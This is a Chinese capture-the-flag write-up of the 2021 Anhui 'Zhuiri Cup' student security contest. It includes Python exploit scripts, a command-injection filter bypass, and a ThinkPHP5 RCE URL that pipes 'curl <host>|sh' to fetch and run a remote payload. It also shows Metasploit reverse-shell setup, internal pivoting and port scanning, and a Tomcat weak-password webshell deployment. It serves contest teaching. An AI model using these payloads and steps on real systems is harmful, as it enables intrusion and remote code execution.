首页 文章详情

首届安徽"追日杯"大学生网络安全挑战赛WRITEUP

白帽子社区 | 391 2021-12-12 16:44 0 0 0
UniSMS (合一短信)

首届安徽"追日杯"大学生网络安全挑战赛 WRITEUP

本文来自“白帽子社区知识星球”

作者:WHT战队



白帽子社区知识星球

加入星球,共同进步
01

checkin

一打开题目复制答案,提交即可。

flag值:flag{welcome_to_zrb@2021}


02

伊泽瑞尔的php

Exp:

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 10:59# @Author  : upload# @File    : ada.py# @Software: PyCharmimport requestsimport zlibimport reimport base64
def x(t,k): return ''.join([chr(ord(x)^ord(y)) for x,y in zip(t,k*(len(t)/len(k)+1))])
session = requests.Session()# @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));cmd = 'system("cat /flag");'cmd = zlib.compress(cmd)cmd = x(cmd,"25ed1bcb")cmd = base64.b64encode(cmd)
rawBody = "423b0b7200f4{cmd}85fc5ff71c8e".format(cmd=cmd)print(rawBody)response = session.post("http://ctf.zrb.edisec.net:19859//index.php", data=rawBody)
print("Response body: %s" % response.content)res = re.findall(r'niGqOXD4rBhBWZ7t423b0b7200f4(.+)85fc5ff71c8e',response.content)[0]
# $r=@base64_encode(@x(@gzcompress($o),$k));res = base64.b64decode(res)res = x(res,"25ed1bcb")res = zlib.decompress(res)print(res)```


03

gotofly

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 9:56# @Author  : upload# @File    : exp.py# @Software: PyCharm

import requestssession = requests.session()import requests
burp0_url = "http://ctf.zrb.edisec.net:30989/flag"burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://ctf.zrb.edisec.net:34231/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
ip = "http://ctf.zrb.edisec.net:34231"r1 = session.get(url=burp0_url,allow_redirects=False)print(r1.headers.get('Location'))r2 = session.get(r1.headers.get('Location'),allow_redirects=False)print(r2.headers.get('Location'))url = ip + r2.headers.get('Location')for i in range(0,1000): r3 = session.get(url,allow_redirects=False) print(r3.text) url = ip + r3.headers.get('Location') print(url)

# while True:# if r1.status_code==301 or r1.status_code == 302:# r1 = result.get(burp0_url,burp0_headers)


04

2_let_me_rce

经测试:

 

①绕过空格 %09

②列目录命令 du -a . 或chgrp -v -R

③ 查看文件 sed p

查看文件:

?cmd=sed%09p%09f1ag_1s_here%09```
```http://ctf.zrb.edisec.net:57807/?cmd='.`sed%09p%09/cccccreal_flag_here_ccccfffffffllllllllaggggg%09`.'```


05

 综合渗透-FLAG1

thinkphp5 rce反弹shell

http://82.156.76.152:8077/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20116.62.104.172|sh

上线msf

```use exploit/multi/script/web_deliveryshow targetsset target 6set payload linux/x64/meterpreter/reverse_tcpset lhost 10.18.228.36run```

查看网段


添加路由

```run autoroute -s 10.134.110.0/24```

扫描存活主机

```msf6 auxiliary(scanner/portscan/tcp) > run[*] 1.14.65.168 - Meterpreter session 6 closed.  Reason: Died
[*] Sending stage (3008420 bytes) to 1.14.65.168[+] 10.134.110.26: - 10.134.110.26:8080 - TCP OPEN[*] 10.134.110.0/24: - Scanned 26 of 256 hosts (10% complete)[+] 10.134.110.34: - 10.134.110.34:3306 - TCP OPEN[+] 10.134.110.52: - 10.134.110.52:80 - TCP OPEN[+] 10.134.110.52: - 10.134.110.52:6379 - TCP OPEN[*] 10.134.110.0/24: - Scanned 52 of 256 hosts (20% complete)[*] 10.134.110.0/24: - Scanned 78 of 256 hosts (30% complete)[*] 10.134.110.0/24: - Scanned 103 of 256 hosts (40% complete)[*] Meterpreter session 8 opened (172.16.174.127:4444 -> 1.14.65.168:41826) at 2021-12-05 14:06:12 +0800[*] 10.134.110.0/24: - Scanned 128 of 256 hosts (50% complete)[*] 10.134.110.0/24: - Scanned 155 of 256 hosts (60% complete)[*] 10.134.110.0/24: - Scanned 180 of 256 hosts (70% complete)[*] 10.134.110.0/24: - Scanned 205 of 256 hosts (80% complete)[*] 10.134.110.0/24: - Scanned 231 of 256 hosts (90% complete)[*] 10.134.110.0/24: - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed
```
06

综合渗透-FLAG3

发现存活主机10.134.110.26开放了8080端口

 

10.134.110.26:8080

 

使用msf将8080转发到8082端口

```portfwd add -l 8082 -p 8080 -r 10.134.110.26```

为一个tomcat服务

```/manager/html```

弱口令tomcat/tomcat,部署war包,拿到flag3

116.62.104.172:8082/cmd/cmd.jsp?cmd=cat+%2Fflag3
07

问卷




如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。



▼扫码关注白帽子社区公众号&加入知识星球▼





good-icon 0
favorite-icon 0
收藏
回复数量: 0
    暂无评论~~
    Ctrl+Enter